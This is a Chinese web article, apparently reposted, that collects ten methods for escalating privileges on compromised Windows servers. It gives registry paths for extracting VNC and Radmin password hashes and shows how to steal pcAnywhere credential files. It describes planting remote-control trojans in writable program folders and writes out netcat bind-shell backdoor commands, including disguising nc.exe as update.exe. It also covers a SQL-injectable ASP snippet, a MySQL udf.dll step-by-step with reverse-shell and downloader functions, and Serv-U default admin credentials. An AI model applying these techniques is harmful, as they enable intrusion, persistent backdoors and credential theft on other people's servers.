您当前位置:设计在线网 >> Php >> 浏览文章

介绍一些系统提权方法汇总

分享到:
本文章讲述了介绍一些系统提权方法汇总.

统提权方法汇总

No.10 Vnc Vnc不少老外都在用,国内用的比较少,但是几率很大。
==VNC提权方法==
利用shell读取vnc保存在注册表中的密文,使用工具VNC4X破解注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password 69 45 150 96 177 b1 243 f3 153 99 89 59 148 94 22 16 No.9 Radmin Radmin是一款很不错的服务器管理无论是远程桌面控制,还是文件传输,速度都很快,很方便。Radmin默认端口是4899,无密码。
不过服务器注重的是安全,一定会修改默认端口和密码的,端口与密码读取位置:HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port//默认端口注册表位置以前我们可以用海洋木马所带的功能来读出键值,然后进行转换得到hash值,
但是现在有个更方便的东西,把ASP文件传到服务器上,打开可直接读出Radmin的hash和Radmin服务端口!No.8 PcAnywhere PcAnywhere是一款用得很多的远程管理软件,他有一个重大漏洞是保存远程管理员帐号的CIF文件密码,是可以被轻易解密的,如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过PCANYWHERE从本机登陆服务器。思路简单而明确。

Ps:保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\如果PCANYWHERE安装在D:\program\文件下下,那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\文件夹下。

No.7搜狗输入法不少管理都使用五笔打字,不过还是有少数人喜欢用拼音,智能ABC功能少,没有全拼功能,所以大多都选择了搜狗输入法。搜狗输入法根目录下有一个:PinyinUp.exe是用来更新词典用的,管理员为了保存词库,有可能会把搜狗输入法安装到D盘,搜狗输入法目录默认是Everyone可读可写,直接捆绑上远控等下次重启就会上线了。No.6 WinWebMail企业邮局系统7i24.com WinWebMail目录下的web必须设置everyone权限可读可写,不然邮件登陆不上去等等,所以在开始程序里找到WinWebMail快捷方式下下来,看路径,访问路径\web传shell,访问shell后,权限是system,放远控进启动项,等待下次重启。没有删cmd组建的直接加用户。

7i24的web目录也是可写,权限为administrator。No.5 NC反弹nc的使用实例c:\nc.exe-l-p 4455-d-e cmd.exe可以很好的隐藏一个NetCat后门。c:\nc.exe-p 4455-d-L-e cmd.exe这个命令可以让黑客利用NetCat重新返回系统,直到系统管理员在任务管理器中看见nc.exe在运行,从而发现这个后门,我们一样可以把它做的更加隐蔽,c:\move nc.exe c:\windows\system32\Drivers\update.exe c:\windows\systeme32\drivers\update.exe-p 4455-d-L-e cmd.exe系统管理员可能把特权附属于一些无害的程序,如update.exe等,黑客也可以隐藏命令行。c:\windows\systme32\drivers\update.exe cmd line:-l-p 4455-d-L-e cmd.exe c:\nc-l-p 80监听80端口nc-l-p 80 c:\log.dat监听80端口,并把信息记录到log.dat中nc-v-l-p 80监听80端口,并显示端口信息nc-vv-l-p 80监听80端口,显示更详细的端口信息nc-l-p 80-t-e cmd.exe监听本地的80端口的入站信息,同时将cmd.exe重定向到80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答。

当然这个最好用在控制的肉鸡上。nc-v ip port扫瞄某IP的某个端口nc-v-z ip port-port扫描某IP的端口到某端口nc-v-z-u ip port-port扫描某IP的某UDP端口到某UDP端口No.4 mssql(sa)mysql(root)sa 1433对外关闭的话,可以构建注入点。%strSQLServerName="服务器ip"strSQLDBUserName="数据库帐号"strSQLDBPassword="数据库密码"strSQLDBName="数据库名称"Set conn=Server.createObject("ADODB.Connection")strCon="Provider=SQLOLEDB.1;Persist Security Info=False;Server="&strSQLServerName&";User ID="&strSQLDBUserName&";Password="&strSQLDBPassword&";Database="&strSQLDBName&";"conn.open strCon dim rs,strSQL,id set rs=server.createobject("ADODB.recordset")id=request("id")strSQL="select*from ACTLIST where worldid="&idrs.open strSQL,conn,1,3 rs.close root su.php配合udf.dll提权

第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。

第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win或system32),否则在下一步操作中你会看到"No paths allowed for shared library"错误。

第三步:使用SQL语句创建功能函数。语法:Create Function函数名(函数名只能为下面列表中的其中之一)returns string soname'导出的DLL路径';对于MYSQL5.0以上版本,语句中的DLL不允许带全路径,如果你在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行,否则你将会看到"Can't open shared library"错误,这时你必须将DLL重新导出到系统目录。

第四步:正确创建功能函数后,你就可以用SQL语句来使用这些功能了。语法:select创建的函数名('参数列表');每个函数有不同的参数,你可以使用select创建的函数名('help');来获得指定函数的参数列表信息。udf.dll功能函数说明:cmdshell执行cmd;downloader下载者,到网上下载指定文件并保存到指定目录;open3389通用开3389终端服务,可指定端口(不改端口无需重启);backshell反弹Shell;ProcessView枚举系统进程;KillProcess终止指定进程;regread读注册表;regwrite写注册表;shut关机,注销,重启;about说明与帮助函数;No.3 03 0day如果支持Asp.Net组件,传Asp.Net Shell,传cmd(在Asp环境下也成功过,不过介绍上写的必须以Asp.Net运行)使用方法:Churrasco.exe"命令"No.2 Serv-u漏洞是使用Serv-u本地默认管理端口,以默认管理员登陆新建域和用户来执行命令,Serv-u 3.x版本默认本地管理端口是:43958,默认管理员:LocalAdministrator,默认密码:#[email protected]$ak#.lk;[email protected],这是集成在Serv-u内部的,可以以Guest权限来进行连接,对Serv-u进行管理。serv-u的那个,其实用webshell查看密码的方法要实用的多,毕竟serv-u的密码很好破解的

推荐阅读:
WordPress提供的功能有哪些
基于PHP自动全局变量---超全局数组
php session重复PHP中Session ID的实现原理
推荐文章  
赞助商链接  
热门排行  
主题推广  
中国设计在线网 All Rights Reserved. 互联网违法和不良信息举报
信息产业部备案号:湘ICP备09001063号